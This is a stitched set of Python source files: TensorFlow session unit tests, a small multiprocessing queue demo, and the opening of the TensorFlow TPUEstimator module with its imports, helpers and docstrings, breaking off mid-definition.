trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
res = tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(42.0, res)
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableOnOperationWithRunOptions(self):
with session.Session() as sess:
a = variables.Variable(42.0)
b = state_ops.assign_add(a, 1.0)
sess.run(a.initializer)
tensor_runner = sess.make_callable(b.op, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(43.0, sess.run(a))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableWithFeedListAndRunOptions(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
tensor_runner = sess.make_callable(
a, feed_list=[ph.name], accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
self.assertAllClose(42.0,
tensor_runner(
41.0,
options=run_options,
run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testOptimizedMakeCallable(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
callable_opts = config_pb2.CallableOptions()
callable_opts.feed.append(ph.name)
callable_opts.fetch.append(a.name)
for _ in range(3):
callable_fn = sess._make_callable_from_options(callable_opts)
for _ in range(5):
self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32)))
def testOptimizedMakeCallableWithRunMetadata(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
callable_opts = config_pb2.CallableOptions()
callable_opts.feed.append(ph.name)
callable_opts.fetch.append(a.name)
callable_opts.run_options.trace_level = config_pb2.RunOptions.FULL_TRACE
callable_fn = sess._make_callable_from_options(callable_opts)
run_metadata = config_pb2.RunMetadata()
self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32),
run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testFeedPrecisionLossError(self):
with session.Session() as sess:
largest_int64 = np.iinfo(np.int64).max
feed_int_implicit_int32 = constant_op.constant(1)
feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32)
out_t = constant_op.constant(1.0)
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64})
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session() as sess:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list)
self.assertAllEqual(
sess.run(feed_t, feed_dict={
feed_t: c_list
}), c_list)
c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list})
self.assertAllEqual(c_v, c_list)
self.assertAllEqual(feed_v, c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [
u'\n\x01\x00', u'\n\x00\x01', u'\u26a3 unicode',
u'\U0001f60e deal with it'
]
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[len(c_list)])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
errors.NotFoundError,
'No session factory registered for the given session options'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, 'Cannot interpret feed_dict'):
sess.run(a, feed_dict={'a': [2.0]})
def testPerStepTrace(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
sess.run(constant_op.constant(1.0))
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
def testRunOptionsRunMetadata(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
# all combinations are valid
sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
sess.run(
constant_op.constant(1.0), options=None, run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0), options=run_options, run_metadata=None)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
with session.Session() as sess:
some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
new_shape = constant_op.constant([2, 2])
reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'):
sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
with self.assertRaisesRegexp(
errors.InvalidArgumentError,
'Input to reshape is a tensor with 4 values, '
'but the requested shape has 21'):
sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})
def testInferShapesFalse(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session()
self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testInferShapesTrue(self):
config = config_pb2.ConfigProto(
graph_options=config_pb2.GraphOptions(infer_shapes=True))
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session(config=config)
self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testBuildCostModel(self):
run_options = config_pb2.RunOptions()
config = config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(build_cost_model=100))
with session.Session(config=config) as sess:
with ops.device('/device:GPU:0'):
a = array_ops.placeholder(dtypes.float32, shape=[])
b = math_ops.add(a, a)
c = array_ops.identity(b)
d = math_ops.multiply(c, c)
for step in xrange(120):
run_metadata = config_pb2.RunMetadata()
sess.run(
d,
feed_dict={a: 1.0},
options=run_options,
run_metadata=run_metadata)
if step == 99:
self.assertTrue(run_metadata.HasField('cost_graph'))
else:
self.assertFalse(run_metadata.HasField('cost_graph'))
def runTestOutputPartitionGraphs(self, sess):
run_options = config_pb2.RunOptions(output_partition_graphs=True)
a = constant_op.constant(1)
run_metadata = config_pb2.RunMetadata()
sess.run(a, options=run_options, run_metadata=run_metadata)
self.assertGreater(len(run_metadata.partition_graphs), 0)
sess.run(a, run_metadata=run_metadata)
self.assertEqual(len(run_metadata.partition_graphs), 0)
def testOutputPartitionGraphsDirect(self):
self.runTestOutputPartitionGraphs(session.Session())
def testOutputPartitionGraphsDistributed(self):
server = server_lib.Server.create_local_server()
self.runTestOutputPartitionGraphs(session.Session(server.target))
def testNonInteractiveSessionNesting(self):
sess1 = session.Session()
sess1_controller = sess1.as_default()
sess1_controller.__enter__()
sess2 = session.Session()
sess2_controller = sess2.as_default()
sess2_controller.__enter__()
with self.assertRaisesRegexp(AssertionError, 'Nesting violated'):
sess1_controller.__exit__(None, None, None)
ops._default_session_stack.reset()
def testInteractiveSessionNesting(self):
sess1 = session.InteractiveSession()
sess2 = session.InteractiveSession()
del sess1
del sess2
def testAsDefault(self):
c = constant_op.constant(37)
sess = session.Session()
with sess.as_default():
self.assertEqual(37, c.eval())
# Ensure that the session remains valid even when it is not captured.
with session.Session().as_default():
self.assertEqual(37, c.eval())
def testReentry(self):
sess = session.Session()
with self.assertRaisesRegexp(RuntimeError, 'not re-entrant'):
with sess:
with sess:
pass
def testInvalidArgument(self):
with self.assertRaisesRegexp(TypeError, 'target must be a string'):
session.Session(37)
with self.assertRaisesRegexp(TypeError, 'config must be a tf.ConfigProto'):
session.Session(config=37)
with self.assertRaisesRegexp(TypeError, 'graph must be a tf.Graph'):
session.Session(graph=37)
def testTimeoutWithShortOperations(self):
num_epochs = 5
q = data_flow_ops.FIFOQueue(capacity=50, dtypes=[dtypes.int32], shapes=[()])
enqueue_op = q.enqueue_many(constant_op.constant([1, 2]))
# Use a 10-second timeout, which should be longer than any
# non-blocking enqueue_many op.
config = config_pb2.ConfigProto(operation_timeout_in_ms=10000)
with session.Session(config=config) as sess:
for _ in range(num_epochs):
sess.run(enqueue_op)
self.assertEqual(sess.run(q.size()), num_epochs * 2)
def testRegisterFetchAndFeedConversionFunctions(self):
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = math_ops.square(tensor)
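# The callables below follow the contract of
# session.register_session_run_conversion_functions: fetch_fn maps a
# SquaredTensor to the list of tensors to fetch plus a function that rebuilds
# the user-facing result from the fetched values; feed_fn1 maps a
# (feed, feed_value) pair to a list of (tensor, value) feed-dict entries;
# feed_fn2 lists the tensors that may be fed when setting up a partial run.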
fetch_fn = lambda squared_tensor: ([squared_tensor.sq], lambda val: val[0])
feed_fn1 = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_fn2 = lambda feed: [feed.sq]
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.assertRaises(ValueError):
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.cached_session() as sess:
np1 = np.array([1.0, 1.5, 2.0, 2.5])
np2 = np.array([3.0, 3.5, 4.0, 4.5])
squared_tensor = SquaredTensor(np2)
squared_eval = sess.run(squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
squared_eval = sess.run(
squared_tensor, feed_dict={
squared_tensor: np1 * np1
})
self.assertAllClose(np1 * np1, squared_eval)
partial_run = sess.partial_run_setup([squared_tensor], [])
squared_eval = sess.partial_run(partial_run, squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
def testDefaultLogDevicePlacement(self):
class CaptureStderr(str):
"""Class to capture stderr from C++ shared library."""
def __enter__(self):
self._esc = compat.as_str('\b')
self._output = compat.as_str('')
self._stderr = sys.stderr
self._fd = self._stderr.fileno()
self._out_pipe, in_pipe = os.pipe()
# Save the original io stream.
self._dup_fd = os.dup(self._fd)
# Replace the original io stream with in pipe.
os.dup2(in_pipe, self._fd)
return self
def __exit__(self, *args):
self._stderr.write(self._esc)
self._stderr.flush()
self.read()
os.close(self._out_pipe)
# Restore the original io stream.
os.dup2(self._dup_fd, self._fd)
def read(self):
while True:
data = os.read(self._out_pipe, 1)
if not data or compat.as_str(data) == self._esc:
break
self._output += compat.as_str(data)
def __str__(self):
return self._output
# Passing the config to the server, but not the session should still result
# in logging device placement.
config = config_pb2.ConfigProto(log_device_placement=True)
server = server_lib.Server.create_local_server(config=config)
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
with session.Session(server.target) as sess:
with CaptureStderr() as log:
sess.run(c)
# Ensure that we did log device placement.
self.assertTrue('/job:local/replica:0/task:0/device:CPU:0' in str(log),
str(log))
def testLocalMasterSessionTimeout(self):
# Test that the timeout passed in a config to the session works correctly.
config = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server()
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target, config=config) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def testDefaultServerTimeout(self):
# Test that the default server config timeout gets used when no Session
# config is provided.
config = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server(config=config)
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def runTestBuildGraphError(self, sess):
# Ensure that errors from building the graph get propagated.
data = array_ops.placeholder(dtypes.float32, shape=[])
# pylint: disable=protected-access
enter_1 = gen_control_flow_ops.enter(data, 'foo_1', False)
enter_2 = gen_control_flow_ops.enter(data, 'foo_2', False)
# pylint: enable=protected-access
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError('has inputs from different frames'):
sess.run(res, feed_dict={data: 1.0})
def testBuildGraphErrorDirect(self):
self.runTestBuildGraphError(session.Session())
def testBuildGraphErrorDist(self):
server = server_lib.Server.create_local_server()
self.runTestBuildGraphError(session.Session(server.target))
def testDeviceAttributes(self):
attrs = session._DeviceAttributes(
'/job:worker/replica:0/task:3/device:CPU:2', 'TYPE', 1337, 1000000)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:2', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
self.assertEqual(1000000, attrs.incarnation)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def testDeviceAttributesCanonicalization(self):
attrs = session._DeviceAttributes('/job:worker/replica:0/task:3/cpu:1',
'TYPE', 1337, 1000000)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:1', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
self.assertEqual(1000000, attrs.incarnation)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def runTestAddFunctionToSession(self, target=''):
"""Add a function to a session after the graph has already been run."""
@function.Defun(dtypes.float32)
def foo(x):
return x + 1
x = constant_op.constant(1.0)
with session.Session(target=target) as sess:
sess.run(x)
f = foo(x)
result = sess.run(f)
self.assertEqual(result, 2.0)
def testAddFunctionToSession(self):
self.runTestAddFunctionToSession()
def testAddFunctionToGrpcSession(self):
server = server_lib.Server.create_local_server()
self.runTestAddFunctionToSession(server.target)
def testOpenAndCloseGrpcSession(self):
server = server_lib.Server.create_local_server()
with session.Session(server.target):
pass
def testOpenAndCloseSession(self):
with session.Session():
pass
def testAutoConvertAndCheckData(self):
with self.cached_session() as sess:
a = array_ops.placeholder(dtype=dtypes.string)
with self.assertRaisesRegexp(
TypeError, 'Type of feed value 1 with type <(\w+) \'int\'> is not'):
sess.run(a, feed_dict={a: 1})
if __name__ == '__main__':
googletest.main()
|
queue_test.py
|
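# A small multiprocessing demo: a child process (send_fast) produces
# timestamped sequence numbers on one queue at a high rate while draining the
# other queue, and the parent process (send_slow) produces on its queue at a
# slower rate, drains the fast queue into a bounded FIFO, and periodically
# prints the most recently received value.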
import multiprocessing as mp
import time
import random
random.seed()
def AppendFIFO(fifo, value, max_values):
fifo.append(value)
while len(fifo) > max_values:
fifo.pop(0)
return fifo
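# A design note (an alternative sketch, not what this script uses): the same
# bounded-FIFO behaviour could come from collections.deque with maxlen, which
# evicts old entries in O(1) instead of the O(n) pop(0) above, e.g.:
#
#   from collections import deque
#   fifo = deque(maxlen=500)
#   fifo.append(value)  # the oldest entry is dropped automatically once full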
def send_slow(queue1, queue2):
somelist = []
maxlen = 500
sequence = 0
while True:
queue1.put((time.time(), sequence))
sequence += 1
sleeptime = random.random() * 0.01
time.sleep(sleeptime)
while not queue2.empty():
val, val2 = queue2.get()
somelist = AppendFIFO(somelist, val, maxlen)
del val2
if sequence % 200 == 0 and somelist:
print("Queue2: {}".format(somelist[-1]))
def send_fast(queue1, queue2):
sequence = 0
while True:
queue2.put((time.time(), sequence))
sequence += 1
sleeptime = random.random() * 0.0001
time.sleep(sleeptime)
while not queue1.empty():
val = queue1.get()
del val
#print("Queue1: {}".format(queue1.get()))
send_queue = mp.Queue()
receive_queue = mp.Queue()
proc = mp.Process(target=send_fast, args=(send_queue, receive_queue,))
proc.start()
send_slow(send_queue, receive_queue)
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.tpu.python.ops import tpu_ops
from tensorflow.contrib.tpu.python.tpu import error_handling
from tensorflow.contrib.tpu.python.tpu import session_support
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_context
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import training_loop
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.contrib.training.python.training import hparam
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator.export import export_output as export_output_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_REWRITE_FOR_INFERENCE_MODE = '_rewrite_for_inference'
# Ideally _USE_TPU_KEY should be reserved as well. However, there are already
# models that make use of this key, so it cannot be reserved now without
# breaking them. In the long run, we would like to mitigate this by migrating
# models off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather than a constant, is to allow
TPUEstimator to adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets iterations_per_loop to 4 in
TPUConfig and steps to 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following values before each TPU training loop:
- 1st TPU execution: iterations_per_loop = 4
- 2nd TPU execution: iterations_per_loop = 4
- 3rd TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 passed in by the
user.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multiple iterations_per_loop variables are found.
"""
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
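# A minimal sketch (hypothetical helper, not part of this module) of the
# schedule described in the docstring above: with iterations_per_loop=4 and
# steps=10, the per-loop iteration counts are 4, 4, 2.
#
#   def _iterations_schedule(total_steps, iterations_per_loop):
#     remaining = total_steps
#     while remaining > 0:
#       yield min(remaining, iterations_per_loop)
#       remaining -= iterations_per_loop
#
#   assert list(_iterations_schedule(10, 4)) == [4, 4, 2]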
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are ususally too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
else:
return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation that increments the eval step by `iterations_per_loop - 1`.
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator's evaluation loop increments the eval step by 1 per run, so we
# add the remaining difference here.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
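# Accounting sketch for the op above (illustrative numbers only): the Estimator
# evaluation loop increments the eval step by 1 per `Session.run`, while each
# run actually executes `iterations_per_loop` steps on the TPU, so this op adds
# the remaining `iterations_per_loop - 1`.
#
#   iterations_per_loop = 8
#   eval_step_increment_per_run = 1 + (iterations_per_loop - 1)  # == 8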
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All reserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for an MNIST example of how to specify
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function; the function returns a list of Tensors. `host_call`
currently works for train() and evaluate(). The function is executed on the
CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must have rank >= 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
